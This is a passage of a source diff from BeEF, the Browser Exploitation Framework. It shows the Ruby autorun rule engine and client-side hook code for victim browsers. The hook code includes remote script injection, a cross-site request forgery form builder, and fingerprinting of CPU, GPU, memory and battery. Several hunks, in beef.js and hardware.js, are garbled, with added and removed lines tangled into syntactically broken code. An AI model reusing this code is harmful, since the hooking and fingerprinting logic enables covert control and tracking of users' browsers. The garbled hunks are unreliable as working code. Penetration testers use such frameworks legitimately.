          # TODO the above works well, but maybe rules need to have priority or something?
          rules.each do |rule|
            begin
              browser_match, os_match = false, false
              b_ver_cond = rule.browser_version.split(' ').first
              b_ver = rule.browser_version.split(' ').last
              os_ver_rule_cond = rule.os_version.split(' ').first
              os_ver_rule_maj = rule.os_version.split(' ').last.split('.').first
              os_ver_rule_min = rule.os_version.split(' ').last.split('.').last
              # Most of the times Linux/*BSD OS doesn't return any version
              # (TODO: improve OS detection on these operating systems)
              if os_version != nil && !@VERSION_STR.include?(os_version)
                os_ver_hook_maj = os_version.split('.').first
                os_ver_hook_min = os_version.split('.').last
                # the following assignments to 0 are need for later checks like:
                # 8.1 >= 7, because if the version doesn't have minor versions, maj/min are the same
                os_ver_hook_min = 0 if os_version.split('.').length == 1
                os_ver_rule_min = 0 if rule.os_version.split('.').length == 1
              else
                # most probably Windows XP or Vista. the following is a hack as Microsoft had the brilliant idea
                # to switch from strings to numbers in OS versioning. To prevent rewriting code later on,
                # we say that XP is Windows 5.0 and Vista is Windows 6.0. Easier for comparison later on.
                  os_ver_hook_maj, os_ver_hook_min = 5, 0 if os_version == 'XP'
                  os_ver_hook_maj, os_ver_hook_min = 6, 0 if os_version == 'Vista'
              end
              os_ver_rule_maj, os_ver_rule_min = 5, 0 if os_ver_rule_maj == 'XP'
              os_ver_rule_maj, os_ver_rule_min = 6, 0 if os_ver_rule_maj == 'Vista'
              next unless @VERSION.include?(b_ver_cond)
              next unless BeEF::Filters::is_valid_browserversion?(b_ver)
              next unless @VERSION.include?(os_ver_rule_cond) || @VERSION_STR.include?(os_ver_rule_cond)
              # os_ver without checks as it can be very different or even empty, for instance on linux/bsd)
              # skip rule unless the browser matches
              browser_match = false
              # check if rule specifies multiple browsers
              if rule.browser !~ /\A[A-Z]+\Z/
                rule.browser.gsub(/[^A-Z,]/i, '').split(',').each do |b|
                  browser_match = true if b == browser || b == 'ALL'
                end
              # else, only one browser
              else
                next unless rule.browser == 'ALL' || browser == rule.browser
                # check if the browser version matches
                browser_version_match = compare_versions(browser_version.to_s, b_ver_cond, b_ver.to_s)
                if browser_version_match
                  browser_match = true
                else
                  browser_match = false
                end
                print_more "Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : #{browser_version_match}"
              end
              next unless browser_match
              # skip rule unless the OS matches
              next unless rule.os == 'ALL' || os == rule.os
              # check if the OS versions match
              if os_version != nil || rule.os_version != 'ALL'
                os_major_version_match = compare_versions(os_ver_hook_maj.to_s, os_ver_rule_cond, os_ver_rule_maj.to_s)
                os_minor_version_match = compare_versions(os_ver_hook_min.to_s, os_ver_rule_cond, os_ver_rule_min.to_s)
              else
                # os_version_match = true if (browser doesn't return an OS version || rule OS version is ALL )
                os_major_version_match, os_minor_version_match = true, true
              end
              os_match = true if os_ver_rule_cond == 'ALL' || (os_major_version_match && os_minor_version_match)
              print_more "OS version check -> (hook) #{os_version} #{rule.os_version} (rule): #{os_major_version_match && os_minor_version_match}"
              if browser_match && os_match
                print_more "Hooked browser and OS type/version MATCH rule: #{rule.name}."
                match_rules.push(rule.id)
              end
            rescue =>  e
              print_error e.message
              print_debug e.backtrace.join("\n")
            end
          end
          print_more "Found [#{match_rules.length}/#{rules.length}] ARE rules matching the hooked browser type/version."
          return match_rules
        end
        # compare versions
        def compare_versions(ver_a, cond, ver_b)
          return true if cond == 'ALL'
          return true if cond == '==' && ver_a == ver_b
          return true if cond == '<=' && ver_a <= ver_b
          return true if cond == '<'  && ver_a <  ver_b
          return true if cond == '>=' && ver_a >= ver_b
          return true if cond == '>'  && ver_a >  ver_b
          return false
        end
      end
    end
  end
 end
--- a/core/main/autorun_engine/models/execution.rb
+++ b/core/main/autorun_engine/models/execution.rb
@@ -0,0 +1,31 @@
 #
 # Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Core
    module AutorunEngine
      module Models
        # @note Stored info about the execution of the ARE on hooked browsers.
        class Execution
          include DataMapper::Resource
          storage_names[:default] = 'core_areexecution'
          property :id, Serial
          property :session, Text                         # hooked browser session where a ruleset triggered
          property :mod_count, Integer                    # number of command modules of the ruleset
          property :mod_successful, Integer               # number of command modules that returned with success
          # By default Text is only 65K, so field length increased to 1 MB
          property :mod_body, Text,    :length => 1024000 # entire command module(s) body to be sent
          property :exec_time, String, :length => 15      # timestamp of ruleset triggering
          property :rule_token, String, :length => 10     # unique token to be appended to wrapper function names
          property :is_sent, Boolean
        end
      end
    end
  end
 end
--- a/core/main/autorun_engine/models/rule.rb
+++ b/core/main/autorun_engine/models/rule.rb
@@ -0,0 +1,34 @@
 #
 # Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Core
    module AutorunEngine
      module Models
        # @note Table stores the rules for the Distributed Engine.
        class Rule
          include DataMapper::Resource
          storage_names[:default] = 'core_arerules'
          property :id, Serial
          property :name, Text                                       # rule name
          property :author, String                                   # rule author
          property :browser, String, :length => 10                   # browser name
          property :browser_version, String, :length => 15           # browser version
          property :os, String, :length => 10                        # OS name
          property :os_version, String, :length => 15                # OS version
          property :modules, Text                                    # JSON stringyfied representation of the JSON rule for further parsing
          property :execution_order, Text                            # command module execution order
          property :execution_delay, Text                            # command module time delays
          property :chain_mode, String, :length => 40                 # rule chaining mode
          has n, :executions
        end
      end
    end
  end
 end
--- a/core/main/autorun_engine/parser.rb
+++ b/core/main/autorun_engine/parser.rb
@@ -0,0 +1,91 @@
 #
 # Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Core
    module AutorunEngine
      class Parser
        include Singleton
        def initialize
          @config = BeEF::Core::Configuration.instance
        end
        BROWSER = ['FF','C','IE','S','O','ALL']
        OS = ['Linux','Windows','OSX','Android','iOS','BlackBerry','ALL']
        VERSION = ['<','<=','==','>=','>','ALL','Vista','XP']
        CHAIN_MODE = ['sequential','nested-forward']
        MAX_VER_LEN = 15
        # Parse a JSON ARE file and returns an Hash with the value mappings
        def parse(name,author,browser, browser_version, os, os_version, modules, exec_order, exec_delay, chain_mode)
          begin
            success = [true]
            return [false, 'Illegal chain_mode definition'] unless CHAIN_MODE.include?(chain_mode)
            return [false, 'Illegal rule name'] unless BeEF::Filters.is_non_empty_string?(name)
            return [false, 'Illegal author name'] unless BeEF::Filters.is_non_empty_string?(author)
            # if multiple browsers were specified, check each browser
            if browser.kind_of?(Array)
              browser.each do |b|
                return [false, 'Illegal browser definition'] unless BROWSER.include?(b)
              end
            # else, if only one browser was specified, check browser and browser version
            else
              return [false, 'Illegal browser definition'] unless BROWSER.include?(browser)
              if browser_version != 'ALL'
                return [false, 'Illegal browser_version definition'] unless
                  VERSION.include?(browser_version[0,2].gsub(/\s+/,'')) &&
                      BeEF::Filters::is_valid_browserversion?(browser_version[2..-1].gsub(/\s+/,'')) && browser_version.length < MAX_VER_LEN
              end
            end
            if os_version != 'ALL'
              return [false, 'Illegal os_version definition'] unless
                  VERSION.include?(os_version[0,2].gsub(/\s+/,'')) &&
                      BeEF::Filters::is_valid_osversion?(os_version[2..-1].gsub(/\s+/,'')) && os_version.length < MAX_VER_LEN
            end
            return [false, 'Illegal os definition'] unless OS.include?(os)
            # check if module names, conditions and options are ok
            modules.each do |cmd_mod|
              mod = BeEF::Core::Models::CommandModule.first(:name => cmd_mod['name'])
              if mod != nil
                modk = BeEF::Module.get_key_by_database_id(mod.id)
                mod_options = BeEF::Module.get_options(modk)
                opt_count = 0
                mod_options.each do |opt|
                   if opt['name'] == cmd_mod['options'].keys[opt_count]
                     opt_count += 1
                   else
                     return [false, "The specified option (#{cmd_mod['options'].keys[opt_count]
                                             }) for module (#{cmd_mod['name']}) does not exist"]
                   end
                end
              else
                return [false, "The specified module name (#{cmd_mod['name']}) does not exist"]
              end
            end
            exec_order.each{ |order| return [false, 'execution_order values must be Integers'] unless order.integer?}
            exec_delay.each{ |delay| return [false, 'execution_delay values must be Integers'] unless delay.integer?}
            return [false, 'execution_order and execution_delay values must be consistent with modules numbers'] unless
                modules.size == exec_order.size && modules.size == exec_delay.size
            success
          rescue => e
            print_error "#{e.message}"
            print_debug "#{e.backtrace.join("\n")}"
            return [false, 'Something went wrong.']
          end
        end
      end
    end
  end
 end
--- a/core/main/autorun_engine/rule_loader.rb
+++ b/core/main/autorun_engine/rule_loader.rb
@@ -0,0 +1,98 @@
 #
 # Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Core
    module AutorunEngine
      class RuleLoader
        include Singleton
        def initialize
          @config = BeEF::Core::Configuration.instance
          @debug_on = @config.get('beef.debug')
        end
        # this expects parsed JSON as input
        def load(data)
          begin
            name = data['name']
            author = data['author']
            browser = data['browser']||'ALL'
            browser_version = data['browser_version']||'ALL'
            os = data['os']||'ALL'
            os_version = data['os_version']||'ALL'
            modules = data['modules']
            exec_order = data['execution_order']
            exec_delay = data['execution_delay']
            chain_mode = data['chain_mode']
            parser_result = BeEF::Core::AutorunEngine::Parser.instance.parse(
                name,author,browser,browser_version,os,os_version,modules,exec_order,exec_delay,chain_mode)
            if parser_result.length == 1 && parser_result.first
              print_info "[ARE] Ruleset (#{name}) parsed and stored successfully."
              if @debug_on
                print_more "Target Browser: #{browser} (#{browser_version})"
                print_more "Target OS: #{os} (#{os_version})"
                print_more "Modules to Trigger:"
                         modules.each do |mod|
                            print_more "(*) Name: #{mod['name']}"
                            print_more "(*) Condition: #{mod['condition']}"
                            print_more "(*) Code: #{mod['code']}"
                            print_more "(*) Options:"
                            mod['options'].each do |key,value|
                              print_more "\t#{key}: (#{value})"
                            end
                         end
                print_more "Exec order: #{exec_order}"
                print_more "Exec delay: #{exec_delay}"
              end
              are_rule = BeEF::Core::AutorunEngine::Models::Rule.new(
                  :name => name,
                  :author => author,
                  :browser => browser,
                  :browser_version => browser_version,
                  :os => os,
                  :os_version => os_version,
                  :modules => modules.to_json,
                  :execution_order => exec_order,
                  :execution_delay => exec_delay,
                  :chain_mode => chain_mode)
              are_rule.save
              return { 'success' => true, 'rule_id' => are_rule.id}
            else
              print_error "[ARE] Ruleset (#{name}): ERROR. " + parser_result.last
              return { 'success' => false, 'error' => parser_result.last }
            end
          rescue => e
            err = 'Malformed JSON ruleset.'
            print_error "[ARE] Ruleset (#{name}): ERROR. #{e} #{e.backtrace}"
            return { 'success' => false, 'error' => err }
          end
        end
        def load_file(json_rule_path)
          begin
            rule_file = File.open(json_rule_path, 'r:UTF-8', &:read)
            self.load JSON.parse(rule_file)
          rescue => e
            print_error "[ARE] Failed to load ruleset from #{json_rule_path}"
          end
        end
        def load_directory
          Dir.glob("#{$root_dir}/arerules/enabled/**/*.json") do |rule|
            print_debug "[ARE] Processing rule: #{rule}"
            self.load_file rule
          end
        end
      end
    end
  end
 end
--- a/core/main/client/are.js
+++ b/core/main/client/are.js
@@ -1,47 +1,18 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 beef.are = {
-  init:function(){
+  status_success: function(){
-   var Jools = require('jools');
+    return 1;
   this.ruleEngine = new Jools();
  },
-  send:function(module){
+  status_unknown: function(){
-    // there will probably be some other stuff here before things are finished
+    return 0;
    this.commands.push(module);
  },
-  execute:function(inputs){
+  status_error: function(){
-    this.rulesEngine.execute(input);
+    return -1;
-  },
+  }
  cache_modules:function(modules){},
  rules:[
    {
      'name':"exec_no_input",
      'condition':function(command,browser){
          //need to figure out how to handle the inputs
          return (!command['inputs'] || command['inputs'].length == 0)
       },
      'consequence':function(command,browser){}
    },
    {
      'name':"module_has_sibling",
      'condition':function(command,commands){
        return false;
      },
      'consequence':function(command,commands){}
    },
    {
      'name':"module_depends_on_module",
      'condition':function(command,commands){
        return false;
      },
      'consequence':function(command,commands){}
    }
  ],
  commands:[],
  results:[]
 };
 beef.regCmp("beef.are");
--- a/core/main/client/beef.js
+++ b/core/main/client/beef.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -12,66 +12,72 @@
 $j = jQuery.noConflict();
 if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 	var BeefJS = {
 		version: '<%= @beef_version %>',
 		// This get set to true during window.onload(). It's a useful hack when messing with document.write().
 		pageIsLoaded: false,
 		// An array containing functions to be executed by the window.onpopstate() method.
 		onpopstate: new Array(),
 		// An array containing functions to be executed by the window.onclose() method.
 		onclose: new Array(),
 		// An array containing functions to be executed by Beef.
 		commands: new Array(),
 		// An array containing all the BeEF JS components.
 		components: new Array(),
-                /**
+    var BeefJS = {
                 * Adds a function to display debug messages (wraps console.log())
                 * @param: {string} the debug string to return
                 */
                debug: function(msg) {
                    if (!<%= @client_debug %>) return;
                    if (typeof console == "object" && typeof console.log == "function") {
                        console.log(msg);
                    } else {
                        // TODO: maybe add a callback to BeEF server for debugging purposes
                        //window.alert(msg);
                    }
                },
-		/**
+        version: '<%= @beef_version %>',
-		 * Adds a function to execute.
+
-		 * @param: {Function} the function to execute.
+        // This get set to true during window.onload(). It's a useful hack when messing with document.write().
-		 */
+        pageIsLoaded: false,
-		execute: function(fn) {
+
-            if ( typeof  beef.websocket == "undefined"){
+        // An array containing functions to be executed by the window.onpopstate() method.
-                 this.commands.push(fn);
+        onpopstate: new Array(),
-            }else{
+
-                fn();
+        // An array containing functions to be executed by the window.onclose() method.
        onclose: new Array(),
        // An array containing functions to be executed by Beef.
        commands: new Array(),
        // An array containing all the BeEF JS components.
        components: new Array(),
        /**
         * Adds a function to display debug messages (wraps console.log())
         * @param: {string} the debug string to return
         */
        debug: function(msg) {
            if (!<%= @client_debug %>) return;
            if (typeof console == "object" && typeof console.log == "function") {
                var currentdate = new Date();
                var pad = function(n){return ("0" + n).slice(-2);}
                var datetime = currentdate.getFullYear() + "-"
                + pad(currentdate.getMonth()+1)  + "-"
                + pad(currentdate.getDate()) + " "
                + pad(currentdate.getHours()) + ":"
                + pad(currentdate.getMinutes()) + ":"
                + pad(currentdate.getSeconds());
                console.log('['+datetime+'] '+msg);
            } else {
                // TODO: maybe add a callback to BeEF server for debugging purposes
                //window.alert(msg);
            }
        },
        /**
        * Adds a function to execute.
        * @param: {Function} the function to execute.
        */
        execute: function(fn) {
                if ( typeof  beef.websocket == "undefined"){
                    this.commands.push(fn);
                }else{
                    fn();
                }
        },
       /**
        * Registers a component in BeEF JS.
        * @params: {String} the component.
        *
        * Components are very important to register so the framework does not
        * send them back over and over again.
        */
        regCmp: function(component) {
                this.components.push(component);
        }
 		/**
 		 * Registers a component in BeEF JS.
 		 * @params: {String} the component.
 		 *
 		 * Components are very important to register so the framework does not
 		 * send them back over and over again.
 		 */
 		regCmp: function(component) {
 			this.components.push(component);
 		}
    };
-	
+
-	window.beef = BeefJS;
+    window.beef = BeefJS;
 }
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
--- a/core/main/client/browser/cookie.js
+++ b/core/main/client/browser/cookie.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -71,12 +71,37 @@ beef.browser.cookie = {
 			( ( domain ) ? ";domain=" + domain : "" ) +
 			";expires=Thu, 01-Jan-1970 00:00:01 GMT";
 		},
 	    /* Never stop the madness dear C. */
 		veganLol: function (){
 			var to_hell= '';
 			var min = 17;
 			var max = 25;
 			var lol_length = Math.floor(Math.random() * (max - min + 1)) + min;
 			var grunt = function(){
 				var moo = Math.floor(Math.random() * 62);
 				var char = '';
 				if(moo < 36){
 					char = String.fromCharCode(moo + 55);
 				}else{
 					char = String.fromCharCode(moo + 61);
 				}
 				if(char != ';' && char != '='){
 					return char;
 				}else{
 					return 'x';
 				}
 			};
 			while(to_hell.length < lol_length){
 				to_hell += grunt();
 			}
 			return to_hell;
 		},
-		hasSessionCookies: function (name)
+		hasSessionCookies: function (name){
-		{
+			this.setCookie( name, beef.browser.cookie.veganLol(), '', '/', '', '' );
 			var name = name || "cookie";
 			if (name == "") name = "cookie";
 			this.setCookie( name, 'none', '', '/', '', '' );
 			cookiesEnabled = (this.getCookie(name) == null)? false:true;
 			this.deleteCookie(name, '/', '');
@@ -84,11 +109,8 @@ beef.browser.cookie = {
 		},
-		hasPersistentCookies: function (name)
+		hasPersistentCookies: function (name){
-		{
+			this.setCookie( name, beef.browser.cookie.veganLol(), 1, '/', '', '' );
 			var name = name || "cookie";
 			if (name == "") name = "cookie";
 			this.setCookie( name, 'none', 1, '/', '', '' );
 			cookiesEnabled = (this.getCookie(name) == null)? false:true;
 			this.deleteCookie(name, '/', '');
--- a/core/main/client/browser/popup.js
+++ b/core/main/client/browser/popup.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -16,7 +16,7 @@ beef.browser.popup = {
 		blocker_enabled: function ()
 		{
-			screenParams = beef.browser.getScreenSize();
+			screenParams = beef.hardware.getScreenSize();
 			var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
 			if (popUp == null || typeof(popUp)=='undefined') {   
 			  	return true;
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -140,7 +140,7 @@ beef.dom = {
            if ($j(this).attr('href') != '')
            {
                e.preventDefault();
-                beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+                beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);
                $j(document).attr('title', $j(this).html());
                document.body.scroll = "no";
                document.documentElement.style.overflow = 'hidden';
@@ -230,6 +230,13 @@ beef.dom = {
 		return form;
 	},
 	loadScript: function(url) {
 	  var s = document.createElement('script');
 	  s.type = 'text/javascript';
 	  s.src = url;
 	  $j('body').append(s);
 	},
 	/**
 	 * Get the location of the current page.
 	 * @return: the location.
@@ -452,7 +459,13 @@ beef.dom = {
            var attributes = inputs[i];
            input = document.createElement('input');
                for(key in attributes){
-                    input.setAttribute(key, attributes[key]);
+                    if (key == 'name' && attributes[key] == 'submit') {
                      // workaround for https://github.com/beefproject/beef/issues/1117
                      beef.debug("createIframeXsrfForm - warning: changed form input 'submit' to 'Submit'");
                      input.setAttribute('Submit', attributes[key]);
                    } else {
                      input.setAttribute(key, attributes[key]);
                    }
                }
            formXsrf.appendChild(input);
        }
--- a/core/main/client/encode/base64.js
+++ b/core/main/client/encode/base64.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/encode/json.js
+++ b/core/main/client/encode/json.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/geolocation.js
+++ b/core/main/client/geolocation.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -1,129 +1,298 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 beef.hardware = {
-	ua: navigator.userAgent,
+  ua: navigator.userAgent,
-	cpuType: function() {
+  /*
-		// IE
+   * @return: {String} CPU type
-		if (typeof navigator.cpuClass != 'undefined') {
+   **/
-			cpu = navigator.cpuClass;
+  getCpuArch: function() {
-			if (cpu == "x86")   return "32-bit";
+    var arch = 'UNKNOWN';
-			if (cpu == "68K")   return "Motorola 68K";
+    // note that actually WOW64 means IE 32bit and Windows 64 bit. we are more interested
-			if (cpu == "PPC")   return "Motorola PPC";
+    // in detecting the OS arch rather than the browser build
-			if (cpu == "Alpha") return "Digital";
+    if (navigator.userAgent.match('(WOW64|x64|x86_64)') || navigator.platform.toLowerCase() == "win64"){
-			if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
+      arch = 'x86_64';
-			if (this.ua.match('Win64; x64'))  return "64-bit (AMD)";
+    }else if(typeof navigator.cpuClass != 'undefined'){
-		// Firefox
+      switch (navigator.cpuClass) {
-        } else if (typeof navigator.oscpu != 'undefined') {
+        case '68K':
-			if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
+          arch = 'Motorola 68K';
-		}
+          break;
-		if (navigator.platform.toLowerCase() == "win64") return "64-bit";
+        case 'PPC':
-		return "32-bit";
+          arch = 'Motorola PPC';
-	},
+          break;
        case 'Digital':
          arch = 'Alpha';
          break;
        default:
          arch = 'x86';
      }
    }
    // TODO we can infer the OS is 64 bit, if we first detect the OS type (os.js).
    // For example, if OSX is at least 10.7, most certainly is 64 bit.
    return arch;
  },
-	isTouchEnabled: function() {
+  /**
-		if ('ontouchstart' in document) return true;
+   * Returns number of CPU cores
-		return false;
+   **/
-	},
+  getCpuCores: function() {
    var cores = 'unknown';
    try {
      if(typeof navigator.hardwareConcurrency != 'undefined') {
        cores = navigator.hardwareConcurrency;
      }
    } catch(e) {
      cores = 'unknown';
    }
    return cores;
  },
-	isVirtualMachine: function() {
+  /**
-		if (screen.width % 2 || screen.height % 2) return true;
+   * Returns CPU details
-		return false;
+   **/
-	},
+  getCpuDetails: function() {
    return {
      arch: beef.hardware.getCpuArch(),
      cores: beef.hardware.getCpuCores()
    }
  },
-	isLaptop: function() {
+  /**
-		// Most common laptop screen resolution
+   * Returns GPU details
-		if (screen.width == 1366 && screen.height == 768) return true;
+   **/
-		// Netbooks
+  getGpuDetails: function() {
-		if (screen.width == 1024 && screen.height == 600) return true;
+    var gpu = 'unknown';
-		return false;
+    var vendor = 'unknown';
-	},
+    // use canvas technique:
    // https://github.com/Valve/fingerprintjs2
    // http://codeflow.org/entries/2016/feb/10/webgl_debug_renderer_info-extension-survey-results/
    try {
      var getWebglCanvas = function () {
        var canvas = document.createElement('canvas')
        var gl = null
        try {
          gl = canvas.getContext('webgl') || canvas.getContext('experimental-webgl')
        } catch (e) { }
        if (!gl) { gl = null }
        return gl;
      }
-	isNokia: function() {
+      var glContext = getWebglCanvas();
-		return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
+      var extensionDebugRendererInfo = glContext.getExtension('WEBGL_debug_renderer_info');
-	},
+      var gpu = glContext.getParameter(extensionDebugRendererInfo.UNMASKED_RENDERER_WEBGL);
      var vendor = glContext.getParameter(extensionDebugRendererInfo.UNMASKED_VENDOR_WEBGL);
      beef.debug("GPU: " + gpu + " - Vendor: " + vendor);
    } catch (e) {
      beef.debug('Failed to detect WebGL renderer: ' + e.toString());
    }
    return {
      gpu: gpu,
      vendor: vendor
    }
  },
-	isZune: function() {
+  /**
-		return (this.ua.match('ZuneWP7')) ? true : false;
+   * Returns RAM (GiB)
-	},
+   **/
  getMemory: function() {
    var memory = 'unknown';
    try {
      if(typeof navigator.deviceMemory != 'undefined') {
        memory = navigator.deviceMemory;
      }
    } catch(e) {
      memory = 'unknown';
    }
    return memory;
  },
-	isHtc: function() {
+  /**
-		return (this.ua.match('HTC')) ? true : false;
+   * Returns battery details
-	},
+   **/
  getBatteryDetails: function() {
    var battery = navigator.battery || navigator.webkitBattery || navigator.mozBattery;
-	isEricsson: function() {
+    if (!!battery) {
-		return (this.ua.match('Ericsson')) ? true : false;
+      return {
-	},
+        chargingStatus: battery.charging,
        batteryLevel: battery.level * 100 + "%",
        chargingTime: battery.chargingTime,
        dischargingTime: battery.dischargingTime
      }
    } else {
      return {
        chargingStatus: 'unknown',
        batteryLevel: 'unknown',
        chargingTime: 'unknown',
        dischargingTime: 'unknown'
      }
    }
  },
-	isMotorola: function() {
+  /**
-		return (this.ua.match('Motorola')) ? true : false;
+   * Returns zombie screen size and color depth.
-	},
+   */
  getScreenSize: function () {
    return {
      width: window.screen.width,
      height: window.screen.height,
      colordepth: window.screen.colorDepth
    }
  },
-	isGoogle: function() {
+  /*
-		return (this.ua.match('Nexus One')) ? true : false;
+   * @return: {Boolean} true or false.
-	},
+   **/
  isTouchEnabled: function() {
    if ('ontouchstart' in document) return true;
    return false;
  },
-        /**
+  /*
-         * Returns true if the browser is on a Mobile Phone
+   * @return: {Boolean} true or false.
-         * @return: {Boolean} true or false
+   **/
-         *
+  isVirtualMachine: function() {
-         * @example: if(beef.hardware.isMobilePhone()) { ... }
+    if (this.getGpuDetails().vendor.match('VMware, Inc'))
-         **/
+      return true;
        isMobilePhone: function() {
            return DetectMobileQuick();
        },
-	getName: function() {
+    if (this.isMobileDevice())
-                var ua = navigator.userAgent.toLowerCase();
+      return false;
                if(DetectIphone())              { return "iPhone"};
                if(DetectIpod())                { return "iPod Touch"};
                if(DetectIpad())                { return "iPad"};
 		if (this.isHtc())               { return 'HTC'};
 		if (this.isMotorola())          { return 'Motorola'};
 		if (this.isZune())              { return 'Zune'};
 		if (this.isGoogle())            { return 'Google Nexus One'};
 		if (this.isEricsson())          { return 'Ericsson'};
                if(DetectAndroidPhone())        { return "Android Phone"};
                if(DetectAndroidTablet())       { return "Android Tablet"};
                if(DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
                if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
                if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
                if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
                if(ua.search(deviceS90) > -1)   { return "Nokia S90"};
                if(ua.search(deviceSymbian) > -1)   { return "Nokia Symbian"};
 		if (this.isNokia())             { return 'Nokia'};
                if(DetectWindowsPhone7())       { return "Windows Phone 7"};
                if(DetectWindowsMobile())       { return "Windows Mobile"};
                if(DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
                if(DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
                if(DetectBlackBerryTouch())     { return "BlackBerry Touch"};
                if(DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
                if(DetectBlackBerry())          { return "BlackBerry"};
                if(DetectPalmOS())              { return "Palm OS"};
                if(DetectPalmWebOS())           { return "Palm Web OS"};
                if(DetectGarminNuvifone())      { return "Gamin Nuvifone"};
                if(DetectArchos())              { return "Archos"}
                if(DetectBrewDevice())          { return "Brew"};
                if(DetectDangerHiptop())        { return "Danger Hiptop"};
                if(DetectMaemoTablet())         { return "Maemo Tablet"};
                if(DetectSonyMylo())            { return "Sony Mylo"};
                if(DetectAmazonSilk())          { return "Kindle Fire"};
                if(DetectKindle())              { return "Kindle"};
                if(DetectSonyPlaystation())                 { return "Playstation"};
                if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
                if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
                if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
                if(DetectXbox())                            { return "Xbox"};
 				if(this.isLaptop())							{ return "Laptop"};
                if(this.isVirtualMachine())                 { return "Virtual Machine"};
-		return 'Unknown';
+    // if the screen resolution is uneven, and it's not a known mobile device
-	}
+    // then it's probably a VM
    if (screen.width % 2 || screen.height % 2)
      return true;
    return false;
  },
  /*
   * @return: {Boolean} true or false.
   **/
  isLaptop: function() {
    if (this.isMobileDevice()) return false;
    // Most common laptop screen resolution
    if (screen.width == 1366 && screen.height == 768) return true;
    // Netbooks
    if (screen.width == 1024 && screen.height == 600) return true;
    return false;
  },
  /*
   * @return: {Boolean} true or false.
   **/
  isNokia: function() {
    return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)|(Lumia )')) ? true : false;
  },
  /*
   * @return: {Boolean} true or false.
   **/
  isZune: function() {
    return (this.ua.match('ZuneWP7')) ? true : false;
  },
  /*
   * @return: {Boolean} true or false.
   **/
  isHtc: function() {
    return (this.ua.match('HTC')) ? true : false;
  },
  /*
   * @return: {Boolean} true or false.
   **/
  isEricsson: function() {
    return (this.ua.match('Ericsson')) ? true : false;
  },
  /*
   * @return: {Boolean} true or false.
   **/
  isMotorola: function() {
    return (this.ua.match('Motorola')) ? true : false;
